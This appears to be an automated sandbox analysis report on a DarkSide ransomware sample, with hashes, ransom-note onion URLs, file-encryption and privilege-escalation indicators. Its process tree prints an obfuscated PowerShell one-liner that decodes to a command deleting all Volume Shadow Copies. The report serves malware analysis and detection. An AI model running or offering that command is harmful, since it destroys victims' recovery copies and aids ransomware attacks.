Analysis
-
max time kernel
97s -
max time network
99s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
11-05-2021 04:25
Static task
static1
Behavioral task
behavioral1
Sample
1.exe
Resource
win7v20210408
Behavioral task
behavioral2
Sample
1.exe
Resource
win10v20210410
General
-
Target
1.exe
-
Size
41KB
-
MD5
a14e07f7da701bd91108f988862a71a0
-
SHA1
bcbe67c6518e68d4056f10fe9191d2900d06190f
-
SHA256
bc32a2ccf158ebe2b76646be865a4c6dd91da6b8e5bb0dd9520102a9bfea5439
-
SHA512
06df2cd0ff26e8452cf139751f498db63d04a85f59a6ccf2e308c8c830fdd15c2dcdee9697e61a22da58c932e6f9440a134f1e6fff3d42d87f0ce97bf4a85442
Malware Config
Extracted
C:\\README.efaa031a.TXT
darkside
http://darksidedxcftmqa.onion/blog/article/id/6/dQDclB_6Kg-c-6fJesONyHoaKh9BtI8j9Wkw2inG8O72jWaOcKbrxMWbPfKrUbHC
http://darksidfqzcuhtk2.onion/K71D6P88YTX04R3ISCJZHMD5IYV55V9247QHJY0HJYUXX68H2P05XPRIR5SP2U68
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Modifies extensions of user files 8 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
1.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a 1.exe File renamed C:\Users\Admin\Pictures\SelectLock.png => C:\Users\Admin\Pictures\SelectLock.png.efaa031a 1.exe File opened for modification C:\Users\Admin\Pictures\SelectLock.png.efaa031a 1.exe File renamed C:\Users\Admin\Pictures\UpdateDisable.tif => C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a 1.exe File opened for modification C:\Users\Admin\Pictures\UpdateDisable.tif.efaa031a 1.exe File renamed C:\Users\Admin\Pictures\EnterTest.tif => C:\Users\Admin\Pictures\EnterTest.tif.efaa031a 1.exe File opened for modification C:\Users\Admin\Pictures\EnterTest.tif.efaa031a 1.exe File renamed C:\Users\Admin\Pictures\ExpandSubmit.tif => C:\Users\Admin\Pictures\ExpandSubmit.tif.efaa031a 1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
1.exepowershell.exepid process 340 1.exe 340 1.exe 1612 powershell.exe 1612 powershell.exe 340 1.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
1.exepowershell.exevssvc.exedescription pid process Token: SeIncreaseQuotaPrivilege 340 1.exe Token: SeSecurityPrivilege 340 1.exe Token: SeTakeOwnershipPrivilege 340 1.exe Token: SeLoadDriverPrivilege 340 1.exe Token: SeSystemProfilePrivilege 340 1.exe Token: SeSystemtimePrivilege 340 1.exe Token: SeProfSingleProcessPrivilege 340 1.exe Token: SeIncBasePriorityPrivilege 340 1.exe Token: SeCreatePagefilePrivilege 340 1.exe Token: SeBackupPrivilege 340 1.exe Token: SeRestorePrivilege 340 1.exe Token: SeShutdownPrivilege 340 1.exe Token: SeDebugPrivilege 340 1.exe Token: SeSystemEnvironmentPrivilege 340 1.exe Token: SeRemoteShutdownPrivilege 340 1.exe Token: SeUndockPrivilege 340 1.exe Token: SeManageVolumePrivilege 340 1.exe Token: 33 340 1.exe Token: 34 340 1.exe Token: 35 340 1.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeBackupPrivilege 636 vssvc.exe Token: SeRestorePrivilege 636 vssvc.exe Token: SeAuditPrivilege 636 vssvc.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
1.exedescription pid process target process PID 340 wrote to memory of 1612 340 1.exe powershell.exe PID 340 wrote to memory of 1612 340 1.exe powershell.exe PID 340 wrote to memory of 1612 340 1.exe powershell.exe PID 340 wrote to memory of 1612 340 1.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"1⤵
- Modifies extensions of user files
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
7ec36b60a53214762d5db00dc3fc6688
SHA1bbc9b66763a203adcf4fa703b8acf6e7518f0675
SHA2566821512af5e48dd3379731ddd4eea396c23b114194a2129118b25224b0d45091
SHA512c7fa5995b6236d716cdaeaa3733dee0259854329fc35738e4e4176ee16bb2e222d25ce644a705755c95c73bed250736b2eb550cc8cf00187c7dcf59651ae7183
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msMD5
60f82d899c5d7a8dc3eb04fbf485bfe7
SHA116b1f8274eaa2f6c33646917ecd1edda0db58f4d
SHA256265085e41f844ba81b6896c47b861061027d4b4f1be2fc22cbebeb52954cff03
SHA5120e640f555b35350c9d9771e00e61ca530671e766eceb2802af0ce5f813c200a952d686fd8118c3505bd08068e222f572014991254408eb8e5f4471d2117d0e23
-
memory/340-59-0x00000000750C1000-0x00000000750C3000-memory.dmpFilesize
8KB
-
memory/1612-66-0x000000001AC34000-0x000000001AC36000-memory.dmpFilesize
8KB
-
memory/1612-63-0x000000001ACB0000-0x000000001ACB1000-memory.dmpFilesize
4KB
-
memory/1612-64-0x0000000002070000-0x0000000002071000-memory.dmpFilesize
4KB
-
memory/1612-62-0x0000000001DC0000-0x0000000001DC1000-memory.dmpFilesize
4KB
-
memory/1612-65-0x000000001AC30000-0x000000001AC32000-memory.dmpFilesize
8KB
-
memory/1612-67-0x00000000024F0000-0x00000000024F1000-memory.dmpFilesize
4KB
-
memory/1612-68-0x000000001C3C0000-0x000000001C3C1000-memory.dmpFilesize
4KB
-
memory/1612-69-0x000000001C580000-0x000000001C581000-memory.dmpFilesize
4KB
-
memory/1612-61-0x000007FEFB701000-0x000007FEFB703000-memory.dmpFilesize
8KB
-
memory/1612-60-0x0000000000000000-mapping.dmp